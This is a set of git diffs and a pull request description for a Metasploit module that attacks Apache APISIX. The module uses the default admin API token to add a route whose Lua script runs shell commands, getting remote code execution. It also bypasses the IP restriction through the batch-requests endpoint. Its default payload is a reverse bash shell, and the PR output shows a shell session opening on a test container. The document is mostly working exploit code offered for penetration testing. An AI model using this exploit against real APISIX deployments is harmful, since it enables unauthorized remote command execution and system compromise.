         'Name' => 'APISIX Admin API default access token RCE',
         'Description' => %q{
-          Apache APISIX has a default built-in API token edd1c9f034335f136f87ad84b625c8f1
-          that can be used to access all the admin API, which leads to the
-          remote LUA code execution through the script parameter added in the 2.x version.
-          This module also leverages the another vulnerability to bypass the IP restriction
-          plugin.
+          Apache APISIX has a default, built-in API token edd1c9f034335f136f87ad84b625c8f1 that can be used to access
+          all of the admin API, which leads to remote LUA code execution through the script parameter added in the 2.x
+          version. This module also leverages another vulnerability to bypass the IP restriction plugin.
         },
         'Author' => [
           'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging
@@ -38,8 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => %w[unix],
         'Targets' => [
           [
-            'Automatic',
-            { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }
+            'Automatic', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }
           ]
         ],
         'Privileged' => false,
@@ -105,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_status("Found an #{server} #{version} http server header")
       return Exploit::CheckCode::Appears if version > Rex::Version.new('2')
     end
-    return Exploit::CheckCode::Safe("There isn't an APISIX server running")
+    return Exploit::CheckCode::Safe('A vulnerable version if APISIX server is not running')
   end
 
   def exploit
@@ -156,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi(params)
   end
 
-  # Using batch request to bypass ip-restricion policies (CVE-2022-24112)
+  # Using batch request to bypass ip-restriction policies (CVE-2022-24112)
   def batch_request(data = nil)
     params = {
       'uri' => normalize_uri(target_uri.path, '/batch-requests'),

--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -1,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'APISIX Admin API default access token RCE',
+        'Description' => %q{
+          Apache APISIX has a default built-in API token edd1c9f034335f136f87ad84b625c8f1
+          that can be used to access all the admin API, which leads to the
+          remote LUA code execution through the script parameter added in the 2.x version.
+        },
+        'Author' => [
+          'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging
+          'YuanSheng Wang <membphis[at]gmail.com>' # discovered
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2020-13945'],
+          ['URL', 'https://github.com/apache/apisix/pull/2244'],
+          ['URL', 'ttps://seclists.org/oss-sec/2020/q4/187']
+        ],
+        'DisclosureDate' => '2020-12-07',
+        'Arch' => ARCH_CMD,
+        'Platform' => %w[win unix],
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to the routes controller', '/apisix/admin/routes']),
+      OptString.new('API_KEY', [true, 'Admin API KEY (Default: edd1c9f034335f136f87ad84b625c8f1)', 'edd1c9f034335f136f87ad84b625c8f1'])
+    ])
+  end
+
+  def check
+    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
+    # perform an unautheticated request to a random path
+    res = send_request_cgi({
+      'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(6)), # random path
+      'method' => 'GET'
+    })
+
+    if res && res.headers.key?('Server')
+      res.headers['Server'].match(%r{APISIX/(.*)$})
+      version = Rex::Version.new(Regexp.last_match(1))
+      vprint_status "Found an APISIX #{version}"
+      if version > Rex::Version.new('2')
+        vprint_good 'This version has the script feature'
+        # authenticated request to the admin routes
+        res = send_request_cgi({
+          'uri' => normalize_uri(target_uri.path.to_s),
+          'method' => 'GET',
+          'headers' => { 'X-API-KEY' => datastore['API_KEY'] }
+        })
+
+        if res && res.code == 200
+          vprint_good 'Succefully performed an authenticated request'
+          return Exploit::CheckCode::Appears
+        end
+      else
+        vprint_error 'This version has not the script feature'
+        return Exploit::CheckCode::Safe
+      end
+    else
+      vprint_error 'Seems not a APISIX server'
+      return Exploit::CheckCode::Safe
+    end
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    add_route Rex::Text.rand_text_alpha_lower(6)
+    handler
+  end
+
+  def add_route(path)
+    # unable to use the built-in lua payload because the default instalation of the APISIX doesn't have the socket module
+    body = "{
+        \"uri\": \"#{path}\",
+        \"script\": \"require('os');os.execute('#{payload.raw.to_s.gsub('\'', '\"')}');\",
+        \"upstream\": {
+          \"type\": \"roundrobin\",
+          \"nodes\": {
+            \"#{Rex::Text.rand_text_alpha_lower(6)}.#{Rex::Text.rand_text_alpha_lower(3)}\": 1
+          }
+        }
+      }" # .to_json - cannot convert hash to json because it encode the '>' to unicode \u003C
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path.to_s),
+      'method' => 'POST',
+      'data' => body,
+      'ctype' => 'application/json',
+      'headers' => {
+        'X-API-KEY' => datastore['API_KEY'],
+        'Accept' => '*/*',
+        'Accept-Encoding' => 'gzip, deflate'
+      }
+    })
+  end
+
+end

--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     )
     register_options([
-      OptString.new('TARGETURI', [true, 'Path to the batch-request controller', '/apisix/batch-requests']),
+      OptString.new('TARGETURI', [true, 'Path to the APISIX DocumentRoot', '/apisix']),
       OptString.new('API_KEY', [true, 'Admin API KEY (Default: edd1c9f034335f136f87ad84b625c8f1)', 'edd1c9f034335f136f87ad84b625c8f1']),
       OptString.new('ALLOWED_IP', [true, 'IP in the allowed list', '127.0.0.1'])
     ])
@@ -78,13 +78,14 @@ class MetasploitModule < Msf::Exploit::Remote
       if version > Rex::Version.new('2')
         vprint_good 'This version has the script feature'
         # authenticated request to the admin routes
-        res = send_request_cgi({
-          'uri' => normalize_uri('/apisix/admin/routes'),
-          'method' => 'GET',
-          'headers' => { 'X-API-KEY' => datastore['API_KEY'] }
-        })
+        # res = send_request_cgi({
+        #   'uri' => normalize_uri("#{target_uri.path.to_s}/admin/routes"),
+        #   'method' => 'GET',
+        #   'headers' => { 'X-API-KEY' => datastore['API_KEY'] }
+        # })
 
-        if res && res.code == 200
+        # if res && res.code == 200
+        if direct_access?
           vprint_good 'Direct access to the routes'
           return Exploit::CheckCode::Appears
         else
@@ -106,50 +107,139 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    add_route Rex::Text.rand_text_alpha_lower(6)
+    payload_uri = "/#{Rex::Text.rand_text_alpha_lower(3)}/#{Rex::Text.rand_text_alpha_lower(6)}"
+    if direct_access?
+      # puts "direct_access"
+      add_route_direct
+    else
+      print_status 'Trying to bypass restriction'
+      add_route_batch payload_uri
+      # trigger the payload
+      apisix_request({
+        'uri' => normalize_uri(payload_uri),
+        'method' => 'GET'
+      })
+    end
     handler
+    # clean_up payload_uri
   end
 
-  def restriction_bypass(method, path, body = nil)
+  # Using batch request to bypass ip-restricion policies (CVE-2022-24112)
+  def batch_request(method = 'POST', data = nil)
+    params = {
+      'uri' => normalize_uri(target_uri.path.to_s + '/batch-requests'),
+      'method' => method
+    }
+    params.merge!({ 'data' => data }) if data
+
+    apisix_request(params)
+  end
+
+  def batch_body(pipeline = [])
     headers = {
       'X-Real-IP': datastore['ALLOWED_IP'].to_s,
+      'X-API-KEY' => datastore['API_KEY'].to_s,
       'Content-Type': 'application/json'
     }
-    pipeline = {
-      method: method.to_s,
-      path: path.to_s
-    }
-    pipeline.merge!({ 'body' => body }) if body
 
-    {
+    data = {
       headers: headers,
-      timeout: 500,
-      pipeline: [pipeline]
+      timeout: 1500,
+      pipeline: pipeline
     }.to_json.gsub(/\\u(....)/) { [Regexp.last_match(1).hex].pack('U') } # handle unicode
   end
 
-  def request(method = 'POST', data = nil)
-    params = {
-      'uri' => normalize_uri(target_uri.path.to_s),
-      'method' => method,
+  def base_data
+    {
+      uri: Rex::Text.rand_text_alpha_lower(6),
+      upstream: {
+        type: 'roundrobin',
+        nodes: { "#{Rex::Text.rand_text_alpha_lower(6)}.#{Rex::Text.rand_text_alpha_lower(3)}": 1 }
+      }
+    }
+  end
+
+  def add_route_direct
+    # binding.pry
+    params = base_data.merge({
+      uri: normalize_uri("#{target_uri.path}/admin/routes"),
+      method: 'POST',
+      script: "os.execute('PAYLOAD');"
+    }).to_json
+    params.gsub!('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
+
+    # puts params
+    # binding.pry
+    # pipeline = [
+    #   {
+    #     method: 'POST',
+    #     path: "#{target_uri.path.to_s}/admin/routes",
+    #     body: data
+    #   }
+    # ]
+
+    # request 'POST', batch_request(pipeline)
+    apisix_request JSON(params)
+  end
+
+  def add_route_batch(payload_uri)
+    data = base_data.merge({
+      uri: payload_uri,
+      name: Rex::Text.rand_text_alpha_lower(6),
+      method: '[GET]',
+      filter_func: "function(vars) os.execute('PAYLOAD'); return true end"
+    }).to_json
+    data.gsub!('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
+
+    pipeline = [
+      {
+        method: 'PUT',
+        path: "#{target_uri.path}/admin/routes/index",
+        body: data
+      }
+    ]
+    # add the route
+    res = batch_request 'POST', batch_body(pipeline)
+    fail_with(Failure::UnexpectedReply, 'Unable to create route') unless res.code == 200
+  end
+
+  def clean_up(route)
+    data = base_data.merge({
+      uri: route,
+      method: '[GET]'
+    }).to_json
+    pipeline = [
+      {
+        method: 'DELETE',
+        path: "#{target_uri.path}/admin/routes/index",
+        body: data
+      }
+    ]
+    # add the route
+    res = batch_request 'POST', batch_body(pipeline)
+  end
+
+  def apisix_request(params = {})
+    fail_with(Failure::BadConfig, 'XXXX.') unless params.key?('method') || params.key?('uri')
+    params.merge!({
       'ctype' => 'application/json',
       'headers' => {
         'X-API-KEY' => datastore['API_KEY'],
         'Accept' => '*/*',
         'Accept-Encoding' => 'gzip, deflate'
       }
-    }
-    params.merge!({ 'data' => data }) if data
-    send_request_cgi(params)
+    })
+    # puts params
+    send_request_cgi params
   end
 
-  def add_route(path)
-    body = "{\"uri\":\"#{path}\",\"script\":\"require('os');os.execute('PAYLOAD');\",\"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"example.com:80\":1}}}"
-    body.gsub!('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
-
-    data = restriction_bypass('POST', '/apisix/admin/routes', body)
-
-    request 'POST', data
+  def direct_access?
+    res = apisix_request({
+      'uri' => normalize_uri("#{target_uri.path}/admin/routes"),
+      'method' => 'GET'
+    })
+    # res && res.code == 200
+    false
   end
 
 end

--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -71,36 +71,30 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET'
     })
 
-    if res && res.headers.key?('Server')
-      res.headers['Server'].match(%r{APISIX/(.*)$})
-      version = Rex::Version.new(Regexp.last_match(1))
-      vprint_status "Found an APISIX #{version}"
-      if version > Rex::Version.new('2')
-        vprint_good 'This version has the script feature'
-        # authenticated request to the admin routes
-        # res = send_request_cgi({
-        #   'uri' => normalize_uri("#{target_uri.path.to_s}/admin/routes"),
-        #   'method' => 'GET',
-        #   'headers' => { 'X-API-KEY' => datastore['API_KEY'] }
-        # })
+    unless res && res.headers.key?('Server')
+      return Exploit::CheckCode::Safe('Seems not a APISIX server')
+    end
 
-        # if res && res.code == 200
-        if direct_access?
-          vprint_good 'Direct access to the routes'
-          return Exploit::CheckCode::Appears
-        else
-          vprint_status 'Trying to bypass restriction'
-          # data = restriction_bypass('GET', '/apisix/admin/routes')
-          # res = request data
-          # TODO: check the response
-        end
-      else
-        vprint_error 'This version has not the script feature'
-        return Exploit::CheckCode::Safe
-      end
-    else
-      vprint_error 'Seems not a APISIX server'
-      return Exploit::CheckCode::Safe
+    res.headers['Server'].match(%r{APISIX/(.*)$})
+    version = Rex::Version.new(Regexp.last_match(1))
+    vprint_status("Found an APISIX #{version}")
+    unless version > Rex::Version.new('2')
+      return Exploit::CheckCode::Safe('This version has not the script feature')
+    end
+
+    vprint_good('This version has the script feature')
+    return Exploit::CheckCode::Appears('There is direct access to the routes using the provided token') if direct_access?
+
+    vprint_status('There is no direct access to the routes. Trying to bypass restriction')
+    pipeline = [
+      {
+        method: 'GET',
+        path: "#{target_uri.path}/admin/routes"
+      }
+    ]
+    res = batch_request(batch_body(pipeline))
+    if res && res.code == 200
+      return Exploit::CheckCode::Appears('Can bypass restriction using batch request')
     end
 
     return Exploit::CheckCode::Unknown
@@ -125,10 +119,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   # Using batch request to bypass ip-restricion policies (CVE-2022-24112)
-  def batch_request(method = 'POST', data = nil)
+  def batch_request(data = nil)
     params = {
       'uri' => normalize_uri(target_uri.path.to_s + '/batch-requests'),
-      'method' => method
+      'method' => 'POST'
     }
     params.merge!({ 'data' => data }) if data
 
@@ -142,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Content-Type': 'application/json'
     }
 
-    data = {
+    {
       headers: headers,
       timeout: 1500,
       pipeline: pipeline
@@ -168,17 +162,6 @@ class MetasploitModule < Msf::Exploit::Remote
     }).to_json
     params.gsub!('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
 
-    # puts params
-    # binding.pry
-    # pipeline = [
-    #   {
-    #     method: 'POST',
-    #     path: "#{target_uri.path.to_s}/admin/routes",
-    #     body: data
-    #   }
-    # ]
-
-    # request 'POST', batch_request(pipeline)
     apisix_request JSON(params)
   end
 
@@ -199,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     ]
     # add the route
-    res = batch_request 'POST', batch_body(pipeline)
+    res = batch_request(batch_body(pipeline))
     fail_with(Failure::UnexpectedReply, 'Unable to create route') unless res.code == 200
   end
 
@@ -216,7 +199,8 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     ]
     # add the route
-    res = batch_request 'POST', batch_body(pipeline)
+    res = batch_request(batch_body(pipeline))
+    fail_with(Failure::UnexpectedReply, 'Unable to delete the route') unless res.code == 200
   end
 
   def apisix_request(params = {})
@@ -238,8 +222,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri("#{target_uri.path}/admin/routes"),
       'method' => 'GET'
     })
-    # res && res.code == 200
-    false
+    res && res.code == 200
   end
 
 end

--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -259,7 +259,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def batch_request_enabled?
     res = apisix_request({
       'uri' => normalize_uri(target_uri.path, '/batch-requests'),
-      'method' => 'GET'
+      'method' => 'POST'
     })
 
     return false if res.code == 404


### PR DESCRIPTION
Added module that leverage the default admin API token for Apache APISIX to add malicious route which leads to the remote LUA code execution through the script parameter added in the 2.x version (CVE-2020-13945).

This module has been tested successfully on Apache APISIX 2.11.0.

## Environment
This module was tested using a vulnerable docker container as available on the [vulnhub ](https://github.com/vulhub/apisix/CVE-2020-13945/docker-compose.yml) project. 

```
docker stack deploy -c docker-compose.yml apisix
```



## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/apache_apisix_api_default_token_rce`
- [ ] `set payload cmd/unix/reverse_bash`
- [ ] `run rhosts=127.0.0.1 rport=9080 lhost=docker0 lport=4444`

## Output
```
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > run rhosts=127.0.0.1 rport=9080 lhost=docker0 lport=4444

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking component version to 127.0.0.1:9080
[+] The target appears to be vulnerable.
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.18.0.4:48162 ) at 2022-02-28 18:32:50 +0100
id

uid=99(nobody) gid=99(nobody) groups=99(nobody)
uname -a
Linux 58f5aba16de9 5.16.8-arch1-1 #1 SMP PREEMPT Tue, 08 Feb 2022 21:21:08 +0000 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 127.0.0.1 - Command shell session 1 closed.
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > 
```